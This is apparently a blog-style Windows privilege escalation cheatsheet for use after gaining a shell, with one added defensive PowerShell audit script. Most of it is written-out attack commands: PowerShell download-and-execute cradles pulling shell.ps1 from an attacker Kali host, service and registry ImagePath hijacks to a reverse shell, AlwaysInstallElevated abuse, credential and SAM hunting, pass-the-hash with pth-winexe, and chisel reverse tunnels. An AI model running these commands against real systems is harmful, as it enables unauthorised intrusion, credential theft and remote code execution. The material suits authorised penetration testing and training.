Win Priv Esc II
Windows Privilege Escalation Cheatsheet
So you got a shell, what now?
This post will help you with local enumeration as well as escalate your privileges further.
Using different enumeration scripts and tools is encouraged; my favourite is WinPEAS. If you are unsure which executable to use, use this
Keep in mind:
To exploit services or registry, you require:
appropriate write permissions
service start permission
service stop permission
Look for non-standard programs on the system
Note: This is a live document. I’ll be adding more content as I learn more
Binaries
Get 64-bit netcat from here
Get Chisel from here
General Information
# If nothing is specified, assume command can be run on cmd.exe or powershell.exe
whoami
echo %username%
whoami /all
hostname
echo %COMPUTERNAME%
net users
net users username
# Note hostname, patches, architecture
systeminfo
# PowerShell
# Both should be the same for ease of exploitation
# If the OS is 64-bit, make a 64-bit shell using nc64.exe
[environment]::Is64BitOperatingSystem
[environment]::Is64BitProcess
# Check LanguageMode (FullLanguage is nicer to have)
$ExecutionContext.SessionState.LanguageMode
# Check AppLocker policy
Get-AppLockerPolicy -Effective
# View RuleCollections in detail
Get-AppLockerPolicy -Effective | Select-Object -ExpandProperty RuleCollections
# all, addresses:port, PID
netstat -ano
File Transfer
# On KALI
# use double-quotes if file path has spaces in it
sudo impacket-smbserver abcd /path/to/serve
# mount the share as a drive letter on Windows
net use Z: \\kali_ip\abcd
net use Z: /d       # disconnect
net use Z: /delete  # then delete
# PowerShell
New-PSDrive -Name "abcd" -PSProvider "FileSystem" -Root "\\kali_ip\abcd"
Remove-PSDrive -Name abcd
# OR copy directly from the share without mounting
copy \\kali_ip\abcd\file_name C:\path\to\save
copy C:\path\to\file \\kali_ip\abcd
# back up the original binary before replacing it
copy "C:\Program Files\...\legit.exe" C:\Temp
copy /Y C:\Downloads\shell.exe "C:\Program Files\...\legit.exe"
# Download to Windows
# Load script in memory
powershell.exe -nop -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://ip/file')"
powershell.exe -c "IEX (iwr http://ip/file -UseBasicParsing)"
# Save script on disk (DownloadFile returns nothing, so there is no IEX here)
powershell.exe -nop -ep bypass -c "(New-Object Net.WebClient).DownloadFile('http://ip/file','C:\Users\Public\Downloads\file')"
powershell.exe -nop -ep bypass -c "IWR -Uri 'http://ip/file' -OutFile 'C:\path\to\file'"
certutil -urlcache -f http://kali_ip/file file
Automated Enumeration
# Run winPEAS
# For color:
# > REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1
# > cmd.exe
.\winpeasany.exe quiet
Accesschk
# .\accesschk.exe /accepteula
# -c : Name a windows service, or use * for all
# -d : Only process directories
# -k : Name a registry key e.g., hklm\software
# -q : Omit banner
# -s : Recurse
# -u : Suppress errors
# -v : Verbose
# -w : Show objects with write access
# Check service permissions
# ALWAYS RUN THE FOLLOWING TO CHECK IF YOU'VE PERMISSIONS TO START AND STOP THE SERVICE
.\accesschk.exe /accepteula -ucqv <user> <svc_name>
# Get all writable services as per groups
.\accesschk.exe /accepteula -uwcqv Users *
.\accesschk.exe /accepteula -uwcqv "Authenticated Users" *
# Is dir writable? - Unquoted service paths
.\accesschk.exe /accepteula -uwdv "C:\Program Files"
# User permissions on an executable
.\accesschk.exe /accepteula -uqv "C:\Program Files\...\file.exe"
# Find all weak permissions - folders
.\accesschk.exe /accepteula -uwdqs Users c:\
.\accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\
# Find all weak permissions - files
.\accesschk.exe /accepteula -uwqs Users c:\*.*
.\accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.*
# Registry ACL - Weak registry permissions
.\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\svc_name
# PowerShell (Get-Acl needs the HKLM:\ provider path)
Get-Acl HKLM:\System\CurrentControlSet\Services\svc_name | Format-List
# Get rights of any file, or folder
# PowerShell
(Get-Acl C:\path\to\file).Access | ft IdentityReference,FileSystemRights,AccessControlType
sc.exe
# Query service configuration
# Verify after doing all the changes
sc qc svc
# Current state of the service
sc query svc
# Modify config (note the space after "binpath=")
sc config svc binpath= "\"C:\Downloads\shell.exe\""
# if dependencies exist
sc config depend_svc start= auto
net start depend_svc
net start svc
# can instead remove dependency too
sc config svc depend= ""
# Start/stop the service
net start svc
net stop svc
Registry
# Query configuration of registry entry of the service
reg query HKLM\System\CurrentControlSet\Services\svc_name
# Point the ImagePath to malicious executable
reg add HKLM\SYSTEM\CurrentControlSet\services\svc_name /v ImagePath /t REG_EXPAND_SZ /d C:\path\shell.exe /f
# Start/stop the service to get the shell
net start/stop svc
# Execute a reverse_shell.msi as admin
# Manually: both queries must return 0x1 for this to be exploitable
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
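As an added example (my own audit script, not part of the original cheatsheet), here is a PowerShell check that finds the same misconfigurations the Accesschk, sc.exe and Registry sections above enumerate by hand: unquoted service paths, service binaries writable by Users, Authenticated Users or Everyone, and AlwaysInstallElevated set in both hives. The function names and the SID list are my assumptions; it uses only built-in cmdlets and runs as a standard user.

```powershell
# Added defensive audit, assumed names: Get-ServiceWeakness / Test-AlwaysInstallElevated
function Get-ServiceWeakness {
    # Low-privilege principals whose write access on a service binary matters:
    # S-1-5-32-545 = Users, S-1-5-11 = Authenticated Users, S-1-1-0 = Everyone
    $lowPriv = 'S-1-5-32-545', 'S-1-5-11', 'S-1-1-0'
    $writeMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
                 [System.Security.AccessControl.FileSystemRights]::Modify -bor
                 [System.Security.AccessControl.FileSystemRights]::FullControl
    foreach ($svc in Get-CimInstance Win32_Service) {
        $path = $svc.PathName
        if (-not $path) { continue }
        # Unquoted path containing spaces: every space is a candidate hijack point
        $unquoted = ($path -notmatch '^"') -and ($path -match ' ') -and ($path -match '(?i)\.exe')
        # Extract the executable from the ImagePath (quoted or not)
        if ($path -match '^"([^"]+)"') { $exe = $Matches[1] }
        else { $exe = $path -replace '(?i)^(.*?\.exe).*$', '$1' }
        $writable = $false
        if (Test-Path -LiteralPath $exe) {
            foreach ($ace in (Get-Acl -LiteralPath $exe).Access) {
                if ($ace.AccessControlType -ne 'Allow') { continue }
                try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
                catch { continue }
                if (($lowPriv -contains $sid) -and ($ace.FileSystemRights -band $writeMask)) { $writable = $true }
            }
        }
        if ($unquoted -or $writable) {
            [pscustomobject]@{
                Service   = $svc.Name
                StartMode = $svc.StartMode
                RunsAs    = $svc.StartName
                Path      = $path
                Unquoted  = $unquoted
                BinaryWritableByLowPriv = $writable
            }
        }
    }
}

function Test-AlwaysInstallElevated {
    # The policy is only in effect when BOTH the HKLM and HKCU values are 1
    $base = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
    $hklm = (Get-ItemProperty "HKLM:\$base" -ErrorAction SilentlyContinue).AlwaysInstallElevated
    $hkcu = (Get-ItemProperty "HKCU:\$base" -ErrorAction SilentlyContinue).AlwaysInstallElevated
    return (($hklm -eq 1) -and ($hkcu -eq 1))
}

Get-ServiceWeakness | Format-Table -AutoSize
"AlwaysInstallElevated in effect: $(Test-AlwaysInstallElevated)"
```

Services that run as LocalSystem with a writable or unquoted path are the ones to fix first (quote the path, tighten the binary's ACL); a True from the second function means the Installer policy should be disabled in both hives.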
Credentials or Hashes
# Common creds locations; anything stored here is plaintext
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s
# If found, prints the location of the file
dir /s <filename> # or extensions
dir /s SAM
dir /s SYSTEM
dir /s Unattend.xml
# Found creds?
# On KALI
# --system only works if admin creds are on hand
winexe -U 'admin%pass123' [--system] //10.10.10.10 cmd.exe
# Found hash?
pth-winexe -U 'domain\admin%LM:NTLM' [--system] //10.10.10.10 cmd.exe
RunAs
# cmd
runas /savecred /user:admin C:\abcd\reverse.exe
# PowerShell Runas 1
$password = ConvertTo-SecureString 'pass123' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('Administrator', $password)
Start-Process -FilePath "powershell" -ArgumentList "IEX (New-Object Net.WebClient).DownloadString('http://kali_ip/shell.ps1')" -Credential $cred
# PowerShell Runas 2
$username = "domain\Administrator"
$password = "pass123"
$secstr = New-Object -TypeName System.Security.SecureString
$password.ToCharArray() | ForEach-Object { $secstr.AppendChar($_) }
$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $username, $secstr
Invoke-Command -ScriptBlock { IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.16/shell.ps1') } -Credential $cred -ComputerName localhost
Find Files Fast
dir /s <filename> # or extensions
Get-ChildItem -Path C:\ -Include *filename_wildcard* -Recurse -ErrorAction SilentlyContinue
Port Forwarding
# If some ports are listening on the target machine but are not reachable from outside, forward them - Port Forwarding
# winexe, pth-winexe, smbexec.py and psexec work over 445; MySQL listens on 3306
# On KALI
./chisel server --reverse --port 9001
# On Windows
.\chisel.exe client KALI_IP:9001 R:KALI_PORT:127.0.0.1:WINDOWS_PORT
# Example --> .\chisel.exe client KALI_IP:9001 R:445:127.0.0.1:445
# On KALI (winexe has no port option, so forward 445 to local 445 as in the example above)
winexe -U 'administrator%pass123' --system //127.0.0.1 cmd.exe
smbexec.py domain/username:password@127.0.0.1
mysql --host=127.0.0.1 --port=KALI_PORT -u username -p
Exploit suggester
Windows exploit suggester can be found here
# On KALI
# Find exploits
# ./windows-exploit-suggester.py --update
./windows-exploit-suggester.py -i systeminfo.txt -d 2020-xxx.xlsx